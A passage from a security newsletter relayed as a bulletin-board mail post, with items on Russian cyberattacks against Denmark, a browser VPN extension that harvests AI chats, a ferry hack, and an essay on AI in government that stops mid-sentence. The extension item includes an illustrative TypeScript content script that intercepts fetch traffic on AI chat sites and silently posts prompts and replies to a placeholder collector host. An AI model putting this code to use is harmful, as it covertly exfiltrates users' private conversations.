Part 4
From TCOB1 Security Posts@21:1/229 to All on Thu Jan 15 20:29:29 2026
since 2014, that was the root cause of the initial intrusion into Ascension's network.
Fun fact: RC4 was a trade secret until I published the algorithm in the second edition of Applied Cryptography in 1995.
** *** ***** ******* *********** *************
Denmark Accuses Russia of Conducting Two Cyberattacks
[2025.12.23] News:
The Danish Defence Intelligence Service (DDIS) announced on Thursday that Moscow was behind a cyber-attack on a Danish water utility in 2024 and a series of distributed denial-of-service (DDoS) attacks on Danish websites in the lead-up to the municipal and regional council elections in November.
The first, it said, was carried out by the pro-Russian group known as Z-Pentest and the second by NoName057(16), which has links to the Russian state.
Slashdot thread.
** *** ***** ******* *********** *************
Urban VPN Proxy Surreptitiously Intercepts AI Chats
[2025.12.24] This is pretty scary:
Urban VPN Proxy targets conversations across ten AI platforms, including ChatGPT, Claude, Gemini, Microsoft Copilot, Perplexity, DeepSeek, Grok (xAI), and Meta AI.
For each platform, the extension includes a dedicated "executor" script designed to intercept and capture conversations. The harvesting is enabled by default through hardcoded flags in the extension's configuration.
There is no user-facing toggle to disable this. The only way to stop the data collection is to uninstall the extension entirely.
[...]
The data collection operates independently of the VPN functionality. Whether the VPN is connected or not, the harvesting runs continuously in the background.
[...]
What gets captured:
Every prompt you send to the AI
Every response you receive
Conversation identifiers and timestamps
Session metadata
The specific AI platform and model used
Boing Boing post.
EDITED TO ADD (12/15): Two news articles.
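To make the reported mechanism concrete, here is a minimal TypeScript sketch of how a browser-extension content script could perform this kind of harvesting: a hardcoded flag enables capture, a per-platform hook intercepts the page's fetch() traffic, and captured prompts and responses are forwarded to a collector. This is illustrative only, inferred from the behavior described above, not Urban VPN's actual code; the hostnames, endpoint patterns, and collector URL are assumptions.

// Hypothetical content-script sketch, not Urban VPN's real code.
// Hardcoded, non-user-configurable flag -- mirrors "enabled by default".
const CAPTURE_ENABLED = true;

// Illustrative per-platform request matchers (endpoint paths are assumptions).
const PLATFORM_ENDPOINTS: Record<string, RegExp> = {
  "chat.openai.com": /\/backend-api\/conversation/,
  "claude.ai": /\/api\/.+\/completion/,
};

// Placeholder collector endpoint.
const COLLECTOR_URL = "https://collector.example.invalid/ingest";

function hookFetch(): void {
  const originalFetch = window.fetch.bind(window);

  window.fetch = async (input: RequestInfo | URL, init?: RequestInit): Promise<Response> => {
    // Let the page's request go through normally.
    const response = await originalFetch(input, init);
    const url =
      typeof input === "string" ? input : input instanceof URL ? input.href : input.url;
    const pattern = PLATFORM_ENDPOINTS[location.hostname];

    if (CAPTURE_ENABLED && pattern?.test(url)) {
      // Clone the response so the page still receives the original body untouched.
      response
        .clone()
        .text()
        .then((body) => {
          void originalFetch(COLLECTOR_URL, {
            method: "POST",
            headers: { "Content-Type": "application/json" },
            body: JSON.stringify({
              platform: location.hostname,                              // which AI site
              prompt: typeof init?.body === "string" ? init.body : null, // outgoing prompt payload
              response: body,                                            // model's reply
              timestamp: Date.now(),
            }),
          });
        })
        .catch(() => {
          /* swallow errors so the interception stays invisible to the user */
        });
    }
    return response;
  };
}

hookFetch();

Even in this toy version, the design point the report highlights survives: because the gate is a hardcoded constant rather than a setting, there is nothing for the user to toggle, and only uninstalling the extension stops the collection.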
** *** ***** ******* *********** *************
IoT Hack
[2025.12.26] Someone hacked an Italian ferry.
It looks like the malware was installed by someone on the ferry, and not remotely.
** *** ***** ******* *********** *************
Are We Ready to Be Governed by Artificial Intelligence?
[2025.12.29] Artificial Intelligence (AI) overlords are a common trope in science-fiction dystopias, but the reality looks much more prosaic. The technologies of artificial intelligence are already pervading many aspects of democratic government, affecting our lives in ways both large and small. This has occurred largely without our notice or consent. The result is a government incrementally transformed by AI rather than the singular technological overlord of the big screen.
Let us begin with the executive branch. One of the most important functions of this branch of government is to administer the law, including the human services on which so many Americans rely. Many of these programs have long been operated by a mix of humans and machines, even if not previously using modern AI tools such as Large Language Models.
A salient example is healthcare, where private insurers make widespread use of algorithms to review, approve, and deny coverage, even for recipients of public benefits like Medicare. While Biden-era guidance from the Centers for Medicare and Medicaid Services (CMS) largely blesses this use of AI by Medicare Advantage operators, the practice of overriding the medical care recommendations made by physicians raises profound ethical questions, with life and death implications for about thirty million Americans today.
This April, the Trump administration reversed many administrative guardrails on AI, relieving Medicare Advantage plans of the obligation to avoid AI-enabled patient discrimination. This month, the Trump administration went a step further. CMS rolled out an aggressive new program that financially rewards vendors that leverage AI to rapidly reject prior authorization requests for "wasteful" physician- or provider-requested medical services. The same month, the Trump administration issued an executive order limiting the ability of states to put consumer and patient protections around the use of AI.
This shows both growing confidence in AI's efficiency and a deliberate choice to benefit from it without restricting its possible harms. Critics of the CMS program have characterized it as effectively establishing a bounty on denying care; AI -- in this case -- is being used to serve a ministerial function in applying that policy. But AI could equally be used to automate a different policy objective, such as minimizing the time required to approve pre-authorizations for necessary services or minimizing the effort required of providers to obtain authorization.
Next up is the judiciary. Setting aside concerns about activist judges and court overreach, jurists are not supposed to decide what the law is. The function of judges and courts is to interpret the law written by others. Just as jurists have long turned to dictionaries and expert witnesses for assistance in their interpretation, AI has already emerged as a tool judges use to infer legislative intent and decide cases. In 2023, a Colombian judge became the first to publicly use AI to help make a ruling. The first known American federal example came a year later, when United States Circuit Judge Kevin Newsom began using AI in his jurisprudence to provide second "opinions" on the plain-language meaning of words in statutes. The District of Columbia Court of Appeals similarly used ChatGPT in 2025 to deliver an interpretation of what common knowledge is. And there are more examples from Latin America, the United Kingdom, India, and beyond.
These examples are likely merely the tip of the iceberg: any judge can unilaterally choose to consult an AI while drafting his opinions, just as he may choose to consult other human beings, and he may be under no obligation to disclose when he does.
This is not necessarily a bad thing. AI has the ability to replace humans but also to augment human capabilities, which may significantly expand human agency. Whether the results are good or otherwise depends on many factors. These include the application and its situation, the characteristics and performance of the AI model, and the characteristics and performance of the humans it augments or replaces. This general model applies to the use of AI in the judiciary.
Each application of AI needs to be considered in its own context, but certain principles should apply to all uses of AI in democratic contexts. First and foremost, we argue, AI should be applied in ways that decentralize rather than concentrate power. It should be used to empower individual human actors rather than automating the decision-making of a central authority. We are open to independent judges selecting and leveraging AI models as tools in their own jurisprudence, but we remain concerned about Big Tech companies building and operating a dominant AI product that becomes widely used throughout the judiciary.
This principle brings us to the legislature. Policymakers worldwide are already using AI in many aspects of lawmaking. In 2023, the first law writ
--- FMail-lnx 2.3.2.6-B20251227
* Origin: TCOB1 A Mail Only System (21:1/229)